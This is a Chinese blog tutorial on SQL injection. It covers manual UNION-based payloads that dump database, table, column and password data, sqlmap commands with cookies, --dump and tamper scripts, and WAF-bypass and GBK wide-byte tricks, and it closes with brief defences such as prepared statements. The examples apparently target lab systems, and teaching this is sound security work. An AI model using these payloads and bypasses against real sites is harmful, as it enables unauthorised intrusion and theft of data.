版权声明:本文为博主原创文章,欢迎转载,请注明出处: https://me.csdn.net/qq_41880069
SQL注入使用总结
一:SQL注入的原理
1:什么是SQL
SQL,指结构化查询语言,作用:访问和处理数据库
也就是说SQL语言的所有操作都是作用于数据库的,那我们的SQL注入的目的就显而易见了,即进入后台数据库,对后台数据库进行查看甚至是修改
2:SQL注入的原理
把SQL命令插入到 Web表单递交 或 输入域名或 页面请求 的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。
3:SQL注入分类
- 根据字符类型分类:①整型注入②字符型注入③宽字节注入
- 注入方法分类:①报错注入②延时注入③布尔型盲注④联合查询注入⑤多语句执行注入
光看理论有些抽象,明白就可,具体看下面注入操作
二:手工注入
1:判断是否存在注入(三步走)
判断是否存在注入,关键看是否出现页面报错信息,如若报错证明其执行了你填写的SQL语句,此时便可以进入下一步
- 给参数赋值单引号,查看页面变化
- 给参数赋值为and 1=1或or1=1,查看页面变化
- 给参数赋值为and 1=2或or1=2,查看页面变化
如若页面出现变化,说明该Web页面存在SQL注入,若没有出现变化,可能没有SQL注入,也可能有但需要特殊的方法绕过
例:
2:判断字段长度
通过使用order by语句来判断后台所查询字段的数目
- 给参数赋值 order by (num),num为测试的数:1,2,3,… 当页面出错时,正确显示页面的最后一个num便为后台所查询字段的数目总数
例:
3:判断显示字段的位置
通过联合查询(union select 字段数)查看可显示字段,此操作的目的通过查看显示位为下一步暴库(显示数据库内信息)做准备
例:
图中payload构造时在union select前加了and1=2,目的是直接显示联合查询的结果,屏蔽其他信息,不屏蔽也是可以的,不过联合查询的信息会在页面显示的其他信息之后
4:暴库——显示数据库内的内容和信息
通过联合查询用上一步已知的显示位查看我们想要知道的信息,例如:用户名,数据库名,版本信息等
例:
payload的如下
http://192.168.(省略)?title=%27and%201=2%20union%20select%201,user(),database(),version(),5,6,7%23
显示位显示了payload对应的内容
接下来我们可以使用如下的payload查看所有数据库的名称
注:MySQL 5.0之后有增加了系统表information_schema,可从其中查询所需信息
http://192.168.(省略)?title=%27and 1=2 union select 1,2,SCHEMA_NAME,4,5,6,7 from information_schema.SCHEMATA limit 0,4%23
例:
limit后面的两个数字,第一个为从第几个数据库开始显示,第二个数字为一次性显示几个,这里注意数据库的其实编号是从0开始的
5:爆表——查看数据库内的数据表信息
使用如下的payload可以显示当前数据库内的数据表信息了
http://192.168.(省略)?title=%27and 1=2 union select 1,2,TABLE_NAME,4,5,6,7 from information_schema.TABLES where TABLE_SCHEMA=database()%23
例:
6:爆字段——查看表中的内容
使用如下的payload查看数据表中的内容
- payload: ’ and 1=2 Union select 1,2,COLUMN_NAME,4,5,6,7 from information_schema.COLUMNS where TABLE_NAME= ‘已经查出的表名’
http://192.168.(省略)?title=' and 1=2 Union select 1,2,COLUMN_NAME,4,5,6,7 from information_schema.COLUMNS where TABLE_NAME= '已经查出的表名'
最后的 ‘已查到的表名’ 中 ‘’ 不可省略
- payload: ’ and 1=2 Union select 1,2,COLUMN_NAME,4,5,6,7 from information_schema.COLUMNS where TABLE_NAME=16进制的表名
http://192.168.(省略)?title=' and 1=2 Union select 1,2,COLUMN_NAME,4,5,6,7 from information_schema.COLUMNS where TABLE_NAME=16进制的表名
此时已查出的表名 不用加 ‘’ ,但是一定要用16进制。例: users 要 改为 0x7573657273
- 例:
7:爆字段内容
使用如下payload:
'and 1=2 Union select 1,2,字段名,4,5,6,7 from 表名 limit 0,1
可以查看字段内容
例:
喜欢记得点赞关注哦,持续更新中
三:SQLmap的使用
1:基本使用方法
建议大家将SQLmap升级到最新使用,升级命令:SQLmap --update,大家如果使用的是Kali的话还可以看我的Kali升级教程,升级系统和所有软件,点击查看:2018最新Kali升级教程
<1>:确定目标
①单个目标网址,使用 -u ,对单一网址进行扫描
例:sqlmap “目标网址”(当目标网址需要登录时还需要带上自己登录的cookie信息)
此时命令为:sqlmap “目标网址” --cookie "你的cookie信息"
sqlmap -u "http://192.168.(省略)?title='" --cookie "PHPSESSID=e09a1a07b94dfdde9944206326ad80d8; security_level=0"
cookie信息的获取:查看页面信息–>在控制台输入document.cookie–>回车后就是你的cookie信息
例:
② 多个目标的扫描,使用 -m 对指定文本文件中所有URL进行扫描(文本文件即txt文件)
例:SQLmap -m “1.txt”
而1.txt文件的内容是:
http://192.168.43.247:8080/otype.asp?classid=2
http://192.168.43.247:8080/onews.asp?id=17
http://192.168.43.247:8080/onews.asp?id=53
③ 可以将一个HTTP请求保存在文件中,然后使用参数 -r 加载该文件,Sqlmap会解析该文件,从该文件分析目标并进行测试
例:sqlmap -r desktop/1.txt (先将HTTP请求保存在文件中,这里是1.txt)
④使用 -l 从burp代理的日志中解析目标
<2>:发起请求实施注入(涉及到的指令稍多)
①:最常用的命令
- --level=LEVEL:执行测试的等级(1-5,默认为1)
例:--level=3 - -p:指定要测试的参数
例:-p “id,user-agent” - --dbs:查询有哪些数据库
查询结果举例:
- --current-db:查看当前数据库
- --current-user:查看当前用户
- --tables:查询某个数据库(需用 -D 指明)下有哪些表
例:-D BWAPP --tables
- --users:列出数据库的所有用户
执行示例:
- --passwords:列出数据库用户的密码(加密时列出的是密码的hash值)
- --columns:查看某个表下的所有列名 (先指明库名和表名)
例:-D BWAPP -T users --columns
- –dump:导出表项,即列对应的内容
例:-D BWAPP -T users -C password --dump
- --dump -all:导出所有表项
例:-D BWAPP -T users -C(指定列名)password --dump
②:进阶操作和注入技巧
- --cookie:cookie注入,当level大于2时自动检测cookie是否存在注入漏洞
例:
sqlmap -u "http://192.168.(省略)?title=’ --cookie “PHPSESSID=e09a1 a07b94d
fdde9944206326ad80d8; security_level=0” - –sql-shell:运行自定义语句
例:
先执行sqlmap -u “url”–cookie “cookie信息” --sql-shell
后面在**sql-shell>**下执行自定义SQL语句
- -b, –banner 获取数据库管理系统的标识
- post注入:--data
该参数指定的数据会被作为POST数据提交,Sqlmap也会检测该参数指定数据是否存在注入漏洞
例:sqlmap -u “http://www.target.com/vuln.php” --data=“id=0&name=admin” - --delay:设置延迟,默认没有延迟
例:--delay 1.5 表示延迟1.5 秒
过于频繁地发送请求可能会被网站察觉甚至引起网站奔溃 - --proxy:设置格式是“http(s): //url:port”
- --tamper:修改注入数据(重点) 绕过waf的关键
例:sqlmap -u"http://www.target.com/vuln.php" --tamper “example.py”
--tamper后面跟脚本文件,在SQLmap的tamper/目录中有许多可用的tamper脚本。tamper脚本的作用是对payload进行混淆达到绕过waf的目的。常见的脚本文件对应的功能——点击查看--temper脚本文件对应功能
当我们自己会写脚本去绕过时,SQLmap就真正掌握了
对于其他指令,想要了解查看的使用指令 sqlmap -h,便可查看
四:SQL注入绕过姿势
1:关键字嵌套,大小写绕过
- 例:union ==> UNIunionO
2:各种编码(对关键字编码)
- URL编码 例如:# 对应的编码为 %23
- 16进制编码 例如:users 对应的编码为 0x7573657273 (有很多在线转换网站)
- ASCII编码
- Unicode编码
- 双重编码
- 还有8进制,utf-32,utf-16 等等
3:注释
常见的注释方法有:
- 末尾注释:#,%23,–,--+
- /**/ 注释: 在构造得查询语句中插入注释,规避对空格的依赖或关键字识别
例如:union/**/select,and/**/1=1
若注释“/**/”不能绕过,可以尝试用“%0b”代替“/**/” - 内联注释 :/*! 要执行的code*/
例如:id=1/*!UnIoN*/SeLeCT - ’ 和 " 注释,用于闭合SQL语句中的引号
4:关键字替换
- 空格替换:/**/,%a0,()
- and替换:&&
- or替换:||
- =替换:<,>,like , rlike
- 引号替换:用16进制编码
5:等价函数绕过
- hex()、bin() ==> ascii()
- sleep() ==>benchmark()
- concat_ws()==>group_concat()
- mid()、substr() ==> substring()
- @@user ==> user()
- @@datadir ==> datadir()
举例:substring()和substr()无法使用时:
?id=1+and+ascii(lower(mid((select+pwd+from+users+limit+1,1),1,1)))=74
或者: - substr((select ‘password’),1,1) = 0x70
- strcmp(left(‘password’,1), 0x69) = 1
- strcmp(left(‘password’,1), 0x70) = 0
- strcmp(left(‘password’,1), 0x71) = -1
还有一些绕过脚本,在上面的--temper参数中都有介绍,可以点击查看temper脚本绕过
6:宽字节的注入
过滤 ’ 的时候往往利用的思路是将 ’ 转换为 \’ 。
在 mysql 中使用 GBK 编码的时候,会认为两个字符为一个汉字,一般有两种思路:
(1)去掉 \ 具体的方法是 urlencode(’) = %5c%27,我们在 %5c%27 前面添加 %df ,形成 %df%5c%27 ,而 mysql 在 GBK 编码方式的时候会将两个字节当做一个汉字,%df%5c 就是一个汉字,%27 作为一个单独的(’)符号在外面:
id=-1%df%27union select 1,user(),3–+
(2)将 ’ 中的 \ 过滤掉,例如可以构造 %**%5c%5c%27 ,后面的 %5c 会被前面的 %5c 注释掉。
一般产生宽字节注入的PHP函数:
-
1.replace():过滤 ’ \ ,将 ’ 转化为 ’ ,将 \ 转为 \,将 " 转为 " 。用思路一。
-
2.addslaches():返回在预定义字符之前添加反斜杠(\)的字符串。预定义字符:’ , " , \ 。用思路一
(防御此漏洞,要将 mysql_query 设置为 binary 的方式) -
3.mysql_real_escape_string():转义下列字符:
\x00 \n \r \ ’ " \x1a
(防御,将mysql设置为gbk即可)
五:防止SQL注入的方法
1:过滤危险字符
类似于“#,–,||,= ” 等等 常用于攻击的字符都要过滤
2:使用预编译语句
使用PDO语句,不将变量拼接到PDO语句中,而使用占位符进行数据库的增,删,改,查。
(PDO需要PHP5核心OO特性的支持,所以它无法运行于之前的PHP版本。在PHP5.1版本及后面的版本,PDO和PDO SQLITE已经包含在了此发行版中。)
313
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
